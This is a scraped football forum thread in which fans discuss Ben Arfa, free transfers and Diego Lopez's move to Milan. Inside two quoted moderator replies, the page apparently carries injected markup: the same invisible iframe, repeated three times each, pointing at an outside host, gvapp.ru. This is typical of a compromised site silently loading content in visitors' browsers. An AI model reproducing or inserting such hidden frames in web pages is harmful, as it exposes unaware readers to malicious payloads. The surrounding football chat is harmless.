Transfers and Rumours - old thread

F

Flavia

Why did my post about Ben Arfa get deleted :lol:

In this thread? There are no deleted posts from the last couple of days.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

DonAK

President of FC Barcelona
In this thread? There are no deleted posts from the last couple of days.
<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

My bad... I for some reason managed to post it in the Barca Transfers and Rumours thread :facepalm:

The fact alone that he's going to Hull should prove that he's not an teenth of the player you rate him to be.
Overrated (or is it overweight?), terrible excuse of a professional.

Man, I miss HBA. I would've loved to see his oppinion on the player who was supposedly Messi's equal not more than a few seasons ago :lol:

Very talented player. Horrible attitude. Wouldn't even have him for the B team.

Shows that talent alone won't take you anywhere.

zanela

Free transfers XI

---------Ochoa-----------
Sagna---Vidic--Alex--Cole
-----M'bia----Cambiasso---
S.sam------Ribas-----Menez
-------------Lewa------------

Ataraxia

Milan have one huge free transfer to pounce at next summer. That's Yarmolenko ...Galliani should do his work there for him to be called a free transfer master.

DonAK

President of FC Barcelona
Diego Lopez was free in theory, ie no cash but in return of giving him to us, Real madrid probably have first choice over Shaarawy and De sciglio.

I read that Real Madrid agreed to terminate his contract by offering him a part of the salary he would miss out on. After doing so, Milan contacted him and signed him on free so I doubt Real Madrid have a first refusal on any AC Milan players.

Ataraxia

I read that Real Madrid agreed to terminate his contract by offering him a part of the salary he would miss out on. After doing so, Milan contacted him and signed him on free so I doubt Real Madrid have a first refusal on any AC Milan players.

well I doubt real madrid would have terminated his contract if it wasnt for him to join milan for free. All in all he was doing great at madrid and have a good salary so why would he move ?, also more importantly madrid could have got at least 7-10million by selling him than just for free. The guy is a top gk.I am sure they did all of this because of perez relationship to Galliani.

Home of Barca Fans